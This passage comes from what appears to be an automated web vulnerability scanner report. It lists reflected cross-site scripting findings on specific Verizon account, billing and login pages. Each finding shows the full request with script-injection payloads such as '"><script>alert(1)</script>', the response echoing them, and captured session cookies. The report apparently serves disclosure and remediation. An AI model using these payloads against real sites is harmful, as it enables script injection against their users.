Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:26 GMT
Connection: close
Set-Cookie: EOrdering=PN-DR-ENABLED=iVwfNps%2fXq8%3d&PROJNORTH-CLIENT=&WR58038_DC=efZHv8OIFvI%3d&HBXSOURCE=TiFI0EpTTVOnzjDD4KXHGQ%3d%3d; domain=.verizon.com; path=/


<script language="javascript">    vzLogging_appName = "eOrdering";</script>

<script language="javascript" src="../Common/includes/js/pagetracker.js"></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD
...[SNIP]...

//End

//Changes made for Project North - if condition added
if ( PostDataToDifferentDataCenter != "Y" )
{

//FlowRoute = "NB-NS89a05
alert(1)//cc561db1e96
";
FlowRoute = ("NB-NS89a05
alert(1)//cc561db1e96");


               locationHref ="RegistrationBridgeProcess.aspx?txtAppId=" + "" + "&from=" + "" + "&FlowRoute=" + Flo
...[SNIP]...

3.119. https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /ForYourHome/MyAccount/Protected/Services/MyServices.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37328"%3b82d1bb06d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37328";82d1bb06d82 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ForYourHome/MyAccount/Protected/Services/MyServices.aspx?37328"%3b82d1bb06d82=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:49:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/
Content-Length: 129022

<!-- Vignette V6 Fri Nov 19 18:49:19 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
d="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx?37328";82d1bb06d82=1';
<!-- Vignette V6 Fri Nov 19 18:49:19 2010 -->
...[SNIP]...

3.120. https://www22.verizon.com/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71f4e"%3b9ffd29efbfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71f4e";9ffd29efbfb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx?71f4e"%3b9ffd29efbfb=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:46:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCQADSRDB=JFJJPGMCOIBMGHBLMKJGGKJD; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660;path=/
Content-Length: 129039

<!-- Vignette V6 Fri Nov 19 18:46:12 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
trMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx?71f4e";9ffd29efbfb=1';
<!-- Vignette V6 Fri Nov 19 18:46:12 2010 -->
...[SNIP]...

3.121. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [UIDPWD parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/ORLogin.aspx

Issue detail

The value of the UIDPWD request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ab8"><script>alert(1)</script>0ab8ac65924 was submitted in the UIDPWD parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/ORLogin.aspx?UIDPWD=Invalid31ab8"><script>alert(1)</script>0ab8ac65924&WTNOnly=Y HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA22V
Content-Type: text/html; charset=utf-8
Content-Length: 47366
Expires: Sat, 20 Nov 2010 02:33:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:55 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&UIDPWD=Invalid31ab8"><script>alert(1)</script>0ab8ac65924&WTNOnly=Y" name="target">
...[SNIP]...

3.122. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [WTNOnly parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/ORLogin.aspx

Issue detail

The value of the WTNOnly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eb64"><script>alert(1)</script>4317d0b7492 was submitted in the WTNOnly parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/ORLogin.aspx?UIDPWD=Invalid&WTNOnly=Y3eb64"><script>alert(1)</script>4317d0b7492 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA22V
Content-Type: text/html; charset=utf-8
Content-Length: 47366
Expires: Sat, 20 Nov 2010 02:33:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:56 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&UIDPWD=Invalid&WTNOnly=Y3eb64"><script>alert(1)</script>4317d0b7492" name="target">
...[SNIP]...

3.123. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 803f5<script>alert(1)</script>a7a0468d9ed was submitted in the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1803f5<script>alert(1)</script>a7a0468d9ed HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Encoding: gzip, deflate
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI; RegistrationApp=SessionId=fe2667e8-4e28-4de7-8250-68e0b90911ca; VZGEO=west
Host: www22.verizon.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 00:59:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:59:08 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:04:08 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47430


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1803f5<script>alert(1)</script>a7a0468d9ed" name="target">
...[SNIP]...

3.124. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 78e35<script>alert(1)</script>a713bc75061 was submitted in the 3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=178e35<script>alert(1)</script>a713bc75061 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA24V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 01:09:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:09:31 GMT
Connection: keep-alive
Set-Cookie: RegistrationApp=SessionId=00ac6571-3565-4f1f-9c9c-e471f00b0bd4; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f945525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:14:31 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47430


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=178e35<script>alert(1)</script>a713bc75061" name="target">
...[SNIP]...

3.125. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5db6f<script>alert(1)</script>d983fc34cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1&5db6f<script>alert(1)</script>d983fc34cd0=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Encoding: gzip, deflate
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI; RegistrationApp=SessionId=fe2667e8-4e28-4de7-8250-68e0b90911ca; VZGEO=west
Host: www22.verizon.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 01:03:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:03:14 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:08:14 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47433


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1&5db6f<script>alert(1)</script>d983fc34cd0=1" name="target">
...[SNIP]...

3.126. https://www22.verizon.com/foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx [Client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx

Issue detail

The value of the Client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b116d"%3balert(1)//c8e1f41e796 was submitted in the Client parameter. This input was echoed as b116d";alert(1)//c8e1f41e796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=EFiOSTV-CHNL&Client=MYVERb116d"%3balert(1)//c8e1f41e796&getstarted=6hboupsell HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 22735
Expires: Sat, 20 Nov 2010 02:33:33 GMT
Cache-Control: max-age=0, no-cache, no-store
